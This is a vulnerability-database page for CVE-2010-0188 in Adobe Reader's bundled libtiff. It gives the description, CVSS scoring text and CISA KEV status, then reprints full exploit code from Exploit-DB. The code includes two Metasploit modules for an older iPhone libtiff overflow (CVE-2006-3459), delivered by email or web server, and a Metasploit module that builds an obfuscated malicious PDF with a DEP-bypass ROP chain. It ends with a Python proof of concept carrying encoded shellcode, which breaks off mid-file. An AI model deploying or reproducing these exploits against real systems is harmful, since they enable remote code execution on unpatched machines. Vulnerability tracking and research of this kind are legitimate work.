CVE-2010-0188 : Detail

CVE-2010-0188

7.8
/
High
32.38%V3
Local
2010-02-21
17h00 +00:00
2025-02-04
21h45 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Unspecified vulnerability in Adobe Reader and Acrobat 8.x before 8.2.1 and 9.x before 9.3.1 allows attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unknown vectors.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE Other No informations.

Metrics

Metrics Score Severity CVSS Vector Source
V3.1 7.8 HIGH CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Base: Exploitabilty Metrics

The Exploitability metrics reflect the characteristics of the thing that is vulnerable, which we refer to formally as the vulnerable component.

Attack Vector

This metric reflects the context by which vulnerability exploitation is possible.

Local

The vulnerable component is not bound to the network stack and the attacker’s path is via read/write/execute capabilities.

Attack Complexity

This metric describes the conditions beyond the attacker’s control that must exist in order to exploit the vulnerability.

Low

Specialized access conditions or extenuating circumstances do not exist. An attacker can expect repeatable success when attacking the vulnerable component.

Privileges Required

This metric describes the level of privileges an attacker must possess before successfully exploiting the vulnerability.

Low

The attacker requires privileges that provide basic user capabilities that could normally affect only settings and files owned by a user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.

User Interaction

This metric captures the requirement for a human user, other than the attacker, to participate in the successful compromise of the vulnerable component.

None

The vulnerable system can be exploited without interaction from any user.

Base: Scope Metrics

The Scope metric captures whether a vulnerability in one vulnerable component impacts resources in components beyond its security scope.

Scope

Formally, a security authority is a mechanism (e.g., an application, an operating system, firmware, a sandbox environment) that defines and enforces access control in terms of how certain subjects/actors (e.g., human users, processes) can access certain restricted objects/resources (e.g., files, CPU, memory) in a controlled manner. All the subjects and objects under the jurisdiction of a single security authority are considered to be under one security scope. If a vulnerability in a vulnerable component can affect a component which is in a different security scope than the vulnerable component, a Scope change occurs. Intuitively, whenever the impact of a vulnerability breaches a security/trust boundary and impacts components outside the security scope in which vulnerable component resides, a Scope change occurs.

Unchanged

An exploited vulnerability can only affect resources managed by the same security authority. In this case, the vulnerable component and the impacted component are either the same, or both are managed by the same security authority.

Base: Impact Metrics

The Impact metrics capture the effects of a successfully exploited vulnerability on the component that suffers the worst outcome that is most directly and predictably associated with the attack. Analysts should constrain impacts to a reasonable, final outcome which they are confident an attacker is able to achieve.

Confidentiality Impact

This metric measures the impact to the confidentiality of the information resources managed by a software component due to a successfully exploited vulnerability.

High

There is a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker. Alternatively, access to only some restricted information is obtained, but the disclosed information presents a direct, serious impact. For example, an attacker steals the administrator's password, or private encryption keys of a web server.

Integrity Impact

This metric measures the impact to integrity of a successfully exploited vulnerability. Integrity refers to the trustworthiness and veracity of information.

High

There is a total loss of integrity, or a complete loss of protection. For example, the attacker is able to modify any/all files protected by the impacted component. Alternatively, only some files can be modified, but malicious modification would present a direct, serious consequence to the impacted component.

Availability Impact

This metric measures the impact to the availability of the impacted component resulting from a successfully exploited vulnerability.

High

There is a total loss of availability, resulting in the attacker being able to fully deny access to resources in the impacted component; this loss is either sustained (while the attacker continues to deliver the attack) or persistent (the condition persists even after the attack has completed). Alternatively, the attacker has the ability to deny some availability, but the loss of availability presents a direct, serious consequence to the impacted component (e.g., the attacker cannot disrupt existing connections, but can prevent new connections; the attacker can repeatedly exploit a vulnerability that, in each instance of a successful attack, leaks a only small amount of memory, but after repeated exploitation causes a service to become completely unavailable).

Temporal Metrics

The Temporal metrics measure the current state of exploit techniques or code availability, the existence of any patches or workarounds, or the confidence in the description of a vulnerability.

Environmental Metrics

These metrics enable the analyst to customize the CVSS score depending on the importance of the affected IT asset to a user’s organization, measured in terms of Confidentiality, Integrity, and Availability.

 nvd@nist.gov
V2 9.3 AV:N/AC:M/Au:N/C:C/I:C/A:C nvd@nist.gov

CISA KEV (Known Exploited Vulnerabilities)

Vulnerability name : Adobe Reader and Acrobat Arbitrary Code Execution Vulnerability

Required action : Apply updates per vendor instructions.

Known To Be Used in Ransomware Campaigns : Known

Added : 2022-03-02 23h00 +00:00

Action is due : 2022-03-23 23h00 +00:00

Important information
This CVE is identified as vulnerable and poses an active threat, according to the Catalog of Known Exploited Vulnerabilities (CISA KEV). The CISA has listed this vulnerability as actively exploited by cybercriminals, emphasizing the importance of taking immediate action to address this flaw. It is imperative to prioritize the update and remediation of this CVE to protect systems against potential cyberattacks.

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 21869

Publication date : 2012-10-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: mobilemail_libtiff.rb 15950 2012-10-09 18:31:08Z rapid7 $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # # This module sends email messages via smtp # include Msf::Exploit::Remote::SMTPDeliver def initialize(info = {}) super(update_info(info, 'Name' => 'Apple iOS MobileMail LibTIFF Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], 'Version' => '$Revision: 15950 $', 'References' => [ ['CVE', '2006-3459'], ['OSVDB', '27723'], ['BID', '19283'] ], 'Stance' => Msf::Exploit::Stance::Passive, 'Payload' => { 'Space' => 1800, 'BadChars' => "", 'Compat' => { 'ConnectionType' => '-bind -find', }, }, 'Arch' => ARCH_ARMLE, 'Targets' => [ [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)', { 'Platform' => 'osx', # Scratch space for our shellcode and stack 'Heap' => 0x00802000, # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib 'Magic' => 0x300d562c, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 01 2006' )) end def autofilter false end def exploit exts = ['jpg', 'tiff', 'tif'] gext = exts[rand(exts.length)] name = rand_text_alpha(rand(10)+1) + ".#{gext}" data = Rex::Text.rand_text_alpha(rand(32)+1) tiff = generate_tiff(target) msg = Rex::MIME::Message.new msg.mime_defaults msg.subject = datastore['SUBJECT'] || Rex::Text.rand_text_alpha(rand(32)+1) msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] msg.add_part(Rex::Text.encode_base64(data, "\r\n"), "text/plain", "base64", "inline") msg.add_part_attachment(tiff, rand_text_alpha(rand(32)+1) + "." + gext) send_message(msg.to_s) print_status("Waiting for a payload session (backgrounding)...") end def generate_tiff(targ) # # This is a TIFF file, we have a huge range of evasion # capabilities, but for now, we don't use them. # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday # lolz = 2048 tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+ "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+ "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+ "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+ "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+ [lolz].pack("V") + "\x84\x00\x00\x00\x00\x00\x00\x00" # Randomize the bajeezus out of our data hehe = rand_text(lolz) # Were going to candy mountain! hehe[120, 4] = [targ['Magic']].pack("V") # >> add r0, r4, #0x30 hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V") # Candy mountain, Charlie! # >> mov r1, sp # It will be an adventure! # >> mov r2, r8 hehe[ 92, 4] = [ hehe.length ].pack("V") # Its a magic leoplurodon! # It has spoken! # It has shown us the way! # >> bl _memcpy # Its just over this bridge, Charlie! # This magical bridge! # >> ldr r3, [r4, #32] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #32] # >> ldr r3, [r4, #36] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #36] # >> ldr r3, [r4, #40] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #40] # >> ldr r3, [r4, #44] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #44] # We made it to candy mountain! # Go inside Charlie! # sub sp, r7, #0x14 hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V") # Goodbye Charlie! # ;; targ['Heap'] + 0x48 becomes the stack pointer # >> ldmia sp!, {r8, r10} # Hey, what the...! # >> ldmia sp!, {r4, r5, r6, r7, pc} # Return back to the copied heap data hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V") # Insert our actual shellcode at heap location + 196 hehe[196, payload.encoded.length] = payload.encoded tiff << hehe end end
Exploit Database EDB-ID : 21868

Publication date : 2012-10-08 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: safari_libtiff.rb 15950 2012-10-09 18:31:08Z rapid7 $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking # # This module acts as an HTTP server # include Msf::Exploit::Remote::HttpServer::HTML def initialize(info = {}) super(update_info(info, 'Name' => 'Apple iOS MobileSafari LibTIFF Buffer Overflow', 'Description' => %q{ This module exploits a buffer overflow in the version of libtiff shipped with firmware versions 1.00, 1.01, 1.02, and 1.1.1 of the Apple iPhone. iPhones which have not had the BSD tools installed will need to use a special payload. }, 'License' => MSF_LICENSE, 'Author' => ['hdm', 'kf'], 'Version' => '$Revision: 15950 $', 'References' => [ ['CVE', '2006-3459'], ['OSVDB', '27723'], ['BID', '19283'] ], 'Payload' => { 'Space' => 1800, 'BadChars' => "", # Multi-threaded applications are not allowed to execve() on OS X # This stub injects a vfork/exit in front of the payload 'Prepend' => [ 0xe3a0c042, # vfork 0xef000080, # sc 0xe3500000, # cmp r0, #0 0x1a000001, # bne 0xe3a0c001, # exit(0) 0xef000080 # sc ].pack("V*") }, 'Arch' => ARCH_ARMLE, 'Targets' => [ [ 'MobileSafari iPhone Mac OS X (1.00, 1.01, 1.02, 1.1.1)', { 'Platform' => 'osx', # Scratch space for our shellcode and stack 'Heap' => 0x00802000, # Deep inside _swap_m88110_thread_state_impl_t() libSystem.dylib 'Magic' => 0x300d562c, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Aug 01 2006' )) end def on_request_uri(cli, req) # Re-generate the payload return if ((p = regenerate_payload(cli)) == nil) # Grab reference to the target t = target print_status("Sending exploit") # Transmit the compressed response to the client send_response(cli, generate_tiff(p, t), { 'Content-Type' => 'image/tiff' }) # Handle the payload handler(cli) end def generate_tiff(code, targ) # # This is a TIFF file, we have a huge range of evasion # capabilities, but for now, we don't use them. # - https://strikecenter.bpointsys.com/articles/2007/10/10/october-2007-microsoft-tuesday # lolz = 2048 tiff = "\x49\x49\x2a\x00\x1e\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"+ "\x00\x00\x00\x00\x00\x00\x08\x00\x00\x01\x03\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x01\x01\x03\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x03\x01\x03\x00"+ "\x01\x00\x00\x00\xaa\x00\x00\x00\x06\x01\x03\x00"+ "\x01\x00\x00\x00\xbb\x00\x00\x00\x11\x01\x04\x00"+ "\x01\x00\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00"+ "\x01\x00\x00\x00\x15\x00\x00\x00\x1c\x01\x03\x00"+ "\x01\x00\x00\x00\x01\x00\x00\x00\x50\x01\x03\x00"+ [lolz].pack("V") + "\x84\x00\x00\x00\x00\x00\x00\x00" # Randomize the bajeezus out of our data hehe = rand_text(lolz) # Were going to candy mountain! hehe[120, 4] = [targ['Magic']].pack("V") # >> add r0, r4, #0x30 hehe[104, 4] = [ targ['Heap'] - 0x30 ].pack("V") # Candy mountain, Charlie! # >> mov r1, sp # It will be an adventure! # >> mov r2, r8 hehe[ 92, 4] = [ hehe.length ].pack("V") # Its a magic leoplurodon! # It has spoken! # It has shown us the way! # >> bl _memcpy # Its just over this bridge, Charlie! # This magical bridge! # >> ldr r3, [r4, #32] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #32] # >> ldr r3, [r4, #36] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #36] # >> ldr r3, [r4, #40] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #40] # >> ldr r3, [r4, #44] # >> ldrt r3, [pc], r3, lsr #30 # >> str r3, [r4, #44] # We made it to candy mountain! # Go inside Charlie! # sub sp, r7, #0x14 hehe[116, 4] = [ targ['Heap'] + 44 + 0x14 ].pack("V") # Goodbye Charlie! # ;; targ['Heap'] + 0x48 becomes the stack pointer # >> ldmia sp!, {r8, r10} # Hey, what the...! # >> ldmia sp!, {r4, r5, r6, r7, pc} # Return back to the copied heap data hehe[192, 4] = [ targ['Heap'] + 196 ].pack("V") # Insert our actual shellcode at heap location + 196 hehe[196, payload.encoded.length] = payload.encoded tiff << hehe end end
Exploit Database EDB-ID : 16670

Publication date : 2010-09-24 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

## # $Id: adobe_libtiff.rb 10477 2010-09-25 11:59:02Z mc $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' require 'zlib' class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT def initialize(info = {}) super(update_info(info, 'Name' => 'Adobe Acrobat Bundled LibTIFF Integer Overflow', 'Description' => %q{ This module exploits an integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8.0 through 8.2 and 9.0 through 9.3. }, 'License' => MSF_LICENSE, 'Author' => [ 'Microsoft', # reported to Adobe 'villy <villys777 [at] gmail.com>', # public exploit # Metasploit version by: 'jduck' ], 'Version' => '$Revision: 10477 $', 'References' => [ [ 'CVE', '2010-0188' ], [ 'BID', '38195' ], [ 'OSVDB', '62526' ], [ 'URL', 'http://www.adobe.com/support/security/bulletins/apsb10-07.html' ], [ 'URL', 'http://secunia.com/blog/76/' ], [ 'URL', 'http://bugix-security.blogspot.com/2010/03/adobe-pdf-libtiff-working-exploitcve.html' ] ], 'DefaultOptions' => { 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', 'DisablePayloadHandler' => 'true', }, 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00", 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ # test results (on Windows XP SP3) # reader 6.0.1 - untested # reader 7.0.5 - untested # reader 7.0.8 - untested # reader 7.0.9 - untested # reader 7.1.0 - untested # reader 7.1.1 - untested # reader 8.0.0 - untested # reader 8.1.1 - untested # reader 8.1.2 - untested # reader 8.1.3 - untested # reader 8.1.4 - untested # reader 8.1.5 - untested # reader 8.1.6 - untested # reader 8.2.0 - untested # reader 9.0.0 - untested # reader 9.1.0 - untested # reader 9.2.0 - untested # reader 9.3.0 - works [ 'Adobe Reader 9.3.0 on Windows XP SP3 English (w/DEP bypass)', { # ew, hardcoded offsets - see make_tiff() } ], ], 'DisclosureDate' => 'Feb 16 2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), ], self.class) end def exploit tiff_data = make_tiff(payload.encoded) xml_data = make_xml(tiff_data) compressed = Zlib::Deflate.deflate(xml_data) # Create the pdf pdf = make_pdf(compressed) print_status("Creating '#{datastore['FILENAME']}' file...") file_create(pdf) end def RandomNonASCIIString(count) result = "" count.times do result << (rand(128) + 128).chr end result end def ioDef(id) "%d 0 obj\r\n" % id end def ioRef(id) "%d 0 R" % id end #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ def nObfu(str) result = "" str.scan(/./u) do |c| if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' result << "#%x" % c.unpack("C*")[0] else result << c end end result end def ASCIIHexWhitespaceEncode(str) result = "" whitespace = "" str.each_byte do |b| result << whitespace << "%02x" % b whitespace = " " * (rand(3) + 1) end result << ">" end def make_pdf(xml_data) xref = [] eol = "\x0d\x0a" endobj = "endobj" << eol pdf = "%PDF-1.5" << eol pdf << "%" << RandomNonASCIIString(4) << eol xref << pdf.length pdf << ioDef(1) << nObfu("<</Filter/FlateDecode/Length ") << xml_data.length.to_s << nObfu("/Type /EmbeddedFile>>") << eol pdf << "stream" << eol pdf << xml_data << eol pdf << eol << "endstream" << eol pdf << endobj xref << pdf.length pdf << ioDef(2) << nObfu("<</V () /Kids [") << ioRef(3) << nObfu("] /T (") << "topmostSubform[0]" << nObfu(") >>") << eol << endobj xref << pdf.length pdf << ioDef(3) << nObfu("<</Parent ") << ioRef(2) << nObfu(" /Kids [") << ioRef(4) << nObfu("] /T (") << "Page1[0]" << nObfu(")>>") pdf << eol << endobj xref << pdf.length pdf << ioDef(4) << nObfu("<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P ") << ioRef(5) pdf << nObfu("/FT /Btn/TU (") << "ImageField1" << nObfu(")/Ff 65536/Parent ") << ioRef(3) pdf << nObfu("/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (") << "ImageField1[0]" << nObfu(")/Rect [107.385 705.147 188.385 709.087]>>") pdf << eol << endobj xref << pdf.length pdf << ioDef(5) << nObfu("<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent ") pdf << ioRef(6) << nObfu("/Type /Page/PieceInfo null>>") pdf << eol << endobj xref << pdf.length pdf << ioDef(6) << nObfu("<</Kids [") << ioRef(5) << nObfu("]/Type /Pages/Count 1>>") pdf << eol << endobj xref << pdf.length pdf << ioDef(7) << ("<</PageMode /UseAttachments/Pages ") << ioRef(6) pdf << ("/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm ") << ioRef(8) pdf << ("/Type /Catalog>>") pdf << eol << endobj xref << pdf.length pdf << ioDef(8) << nObfu("<</DA (/Helv 0 Tf 0 g )/XFA [(template) ") << ioRef(1) << nObfu("]/Fields [") pdf << ioRef(2) << nObfu("]>>") pdf << endobj << eol xrefPosition = pdf.length pdf << "xref" << eol pdf << "0 %d" % (xref.length + 1) << eol pdf << "0000000000 65535 f" << eol xref.each do |index| pdf << "%010d 00000 n" % index << eol end pdf << "trailer" << nObfu("<</Size %d/Root " % (xref.length + 1)) << ioRef(7) << ">>" << eol pdf << "startxref" << eol pdf << xrefPosition.to_s() << eol pdf << "%%EOF" end def make_tiff(code) tiff_offset = 0x2038 shellcode_offset = 1500 tiff = "II*\x00" tiff << [tiff_offset].pack('V') tiff << make_nops(shellcode_offset) tiff << code # Padding tiff << rand_text_alphanumeric(tiff_offset - 8 - code.length - shellcode_offset) tiff << "\x07\x00\x00\x01\x03\x00\x01\x00" tiff << "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00" tiff << "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01" tiff << "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00" tiff << "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20" tiff << "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00" tiff << "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00" # The following executes a ret2lib using BIB.dll # The effect is to bypass DEP and execute the shellcode in an indirect way stack_data = [ 0x70072f7, # pop eax / ret 0x10104, 0x70015bb, # pop ecx / ret 0x1000, 0x700154d, # mov [eax], ecx / ret 0x70015bb, # pop ecx / ret 0x7ffe0300, # -- location of KiFastSystemCall 0x7007fb2, # mov eax, [ecx] / ret 0x70015bb, # pop ecx / ret 0x10011, 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret 0x70015bb, # pop ecx / ret 0x10100, 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret 0x70072f7, # pop eax / ret 0x10011, 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?) 0x7005c54, # pop esi / add esp,0x14 / ret 0xffffffff, 0x10100, 0x0, 0x10104, 0x1000, 0x40, # The next bit effectively copies data from the interleaved stack to the memory # pointed to by eax # The data copied is: # \x5a\x52\x6a\x02\x58\xcd\x2e\x3c\xf4\x74\x5a\x05\xb8\x49\x49\x2a # \x00\x8b\xfa\xaf\x75\xea\x87\xfe\xeb\x0a\x5f\xb9\xe0\x03\x00\x00 # \xf3\xa5\xeb\x09\xe8\xf1\xff\xff\xff\x90\x90\x90\xff\xff\xff\x90 0x700d731, # mov eax, [ebp-0x24] / ret 0x70015bb, # pop ecx / ret 0x26a525a, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x3c2ecd58, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xf4745a05, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x2a4949b8, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xaffa8b00, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xfe87ea75, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xb95f0aeb, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x3e0, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x9eba5f3, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0xfffff1e8, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x909090ff, 0x700154d, # mov [eax], ecx / ret 0x700a722, # add eax, 4 / ret 0x70015bb, # pop ecx / ret 0x90ffffff, 0x700154d, # mov [eax], ecx / ret 0x700d731, # mov eax, [ebp-0x24] / ret 0x700112f # call eax -- (execute stub to transition to full shellcode) ].pack('V*') tiff << stack_data Rex::Text.encode_base64(tiff) end def make_xml(tiff_data) xml_data = %Q|<?xml version="1.0" encoding="UTF-8" ?> <xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"> <config xmlns="http://www.xfa.org/schema/xci/1.0/"> <present> <pdf> <version>1.65</version> <interactive>1</interactive> <linearized>1</linearized> </pdf> <xdp> <packets>*</packets> </xdp> <destination>pdf</destination> </present> </config> <template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/"> <subform name="topmostSubform" layout="tb" locale="en_US"> <pageSet> <pageArea id="PageArea1" name="PageArea1"> <contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" /> <medium short="612pt" long="792pt" stock="custom" /> </pageArea> </pageSet> <subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt"> <break before="pageArea" beforeTarget="#PageArea1" /> <bind match="none" /> <field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm"> <ui> <imageEdit /> </ui> </field> <?templateDesigner expand 1?> </subform> <?templateDesigner expand 1?> </subform> <?templateDesigner FormTargetVersion 24?> <?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?> <?templateDesigner Zoom 94?> </template> <xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"> <xfa:data> <topmostSubform> <ImageField1 xfa:contentType="image/tif" href="">REPLACE_TIFF</ImageField1> </topmostSubform> </xfa:data> </xfa:datasets> <PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" /> <form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/"> <subform name="topmostSubform"> <instanceManager name="_Page1" /> <subform name="Page1"> <field name="ImageField1" /> </subform> <pageSet> <pageArea name="PageArea1" /> </pageSet> </subform> </form> </xdp:xdp> | xml_data.gsub!(/REPLACE_TIFF/, tiff_data) xml_data end end
Exploit Database EDB-ID : 11787

Publication date : 2010-03-16 23h00 +00:00
Author : villy
EDB Verified : Yes

__doc__=''' Title: Adobe PDF LibTiff Integer Overflow Code Execution. Product: Adobe Acrobat Reader Version: <=8.3.0, <=9.3.0 CVE: 2010-0188 Author: villy (villys777 at gmail.com) Site: http://bugix-security.blogspot.com/ Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3) ------------------------------------------------------------------------ ''' import sys import base64 import struct import zlib import StringIO SHELLCODE_OFFSET=0x555 TIFF_OFSET=0x2038 # windows/exec - 227 bytes # http://www.metasploit.com # Encoder: x86/shikata_ga_nai # EXITFUNC=process, CMD=calc.exe buf = "\x2b\xc9\xd9\xc0\xd9\x74\x24\xf4\x5e\xb1\x33\xba\xd9\xb4" buf += "\x0a\xbe\x31\x56\x15\x03\x56\x15\x83\x1f\xb0\xe8\x4b\x63" buf += "\x51\x65\xb3\x9b\xa2\x16\x3d\x7e\x93\x04\x59\x0b\x86\x98" buf += "\x29\x59\x2b\x52\x7f\x49\xb8\x16\xa8\x7e\x09\x9c\x8e\xb1" buf += "\x8a\x10\x0f\x1d\x48\x32\xf3\x5f\x9d\x94\xca\x90\xd0\xd5" buf += "\x0b\xcc\x1b\x87\xc4\x9b\x8e\x38\x60\xd9\x12\x38\xa6\x56" buf += "\x2a\x42\xc3\xa8\xdf\xf8\xca\xf8\x70\x76\x84\xe0\xfb\xd0" buf += "\x35\x11\x2f\x03\x09\x58\x44\xf0\xf9\x5b\x8c\xc8\x02\x6a" buf += "\xf0\x87\x3c\x43\xfd\xd6\x79\x63\x1e\xad\x71\x90\xa3\xb6" buf += "\x41\xeb\x7f\x32\x54\x4b\x0b\xe4\xbc\x6a\xd8\x73\x36\x60" buf += "\x95\xf0\x10\x64\x28\xd4\x2a\x90\xa1\xdb\xfc\x11\xf1\xff" buf += "\xd8\x7a\xa1\x9e\x79\x26\x04\x9e\x9a\x8e\xf9\x3a\xd0\x3c" buf += "\xed\x3d\xbb\x2a\xf0\xcc\xc1\x13\xf2\xce\xc9\x33\x9b\xff" buf += "\x42\xdc\xdc\xff\x80\x99\x13\x4a\x88\x8b\xbb\x13\x58\x8e" buf += "\xa1\xa3\xb6\xcc\xdf\x27\x33\xac\x1b\x37\x36\xa9\x60\xff" buf += "\xaa\xc3\xf9\x6a\xcd\x70\xf9\xbe\xae\x17\x69\x22\x1f\xb2" buf += "\x09\xc1\x5f\x00" class CVE20100188Exploit: def __init__(self,shellcode): self.shellcode = shellcode self.tiff64=base64.b64encode(self.gen_tiff()) def gen_tiff(self): tiff = '\x49\x49\x2a\x00' tiff += struct.pack("<L", TIFF_OFSET) tiff += '\x90' * (SHELLCODE_OFFSET) tiff += self.shellcode tiff += '\x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET) tiff += "\x07\x00\x00\x01\x03\x00\x01\x00" tiff += "\x00\x00\x30\x20\x00\x00\x01\x01\x03\x00\x01\x00\x00\x00\x01\x00" tiff += "\x00\x00\x03\x01\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x06\x01" tiff += "\x03\x00\x01\x00\x00\x00\x01\x00\x00\x00\x11\x01\x04\x00\x01\x00" tiff += "\x00\x00\x08\x00\x00\x00\x17\x01\x04\x00\x01\x00\x00\x00\x30\x20" tiff += "\x00\x00\x50\x01\x03\x00\xCC\x00\x00\x00\x92\x20\x00\x00\x00\x00" tiff += "\x00\x00\x00\x0C\x0C\x08\x24\x01\x01\x00\xF7\x72\x00\x07\x04\x01" tiff += "\x01\x00\xBB\x15\x00\x07\x00\x10\x00\x00\x4D\x15\x00\x07\xBB\x15" tiff += "\x00\x07\x00\x03\xFE\x7F\xB2\x7F\x00\x07\xBB\x15\x00\x07\x11\x00" tiff += "\x01\x00\xAC\xA8\x00\x07\xBB\x15\x00\x07\x00\x01\x01\x00\xAC\xA8" tiff += "\x00\x07\xF7\x72\x00\x07\x11\x00\x01\x00\xE2\x52\x00\x07\x54\x5C" tiff += "\x00\x07\xFF\xFF\xFF\xFF\x00\x01\x01\x00\x00\x00\x00\x00\x04\x01" 